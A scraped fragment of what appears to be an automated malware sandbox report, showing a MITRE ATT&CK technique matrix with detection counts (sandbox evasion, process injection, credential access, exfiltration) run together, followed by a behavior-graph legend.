            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion22Credentials in Registry1Virtualization/Sandbox Evasion22Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSystem Information Discovery213Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET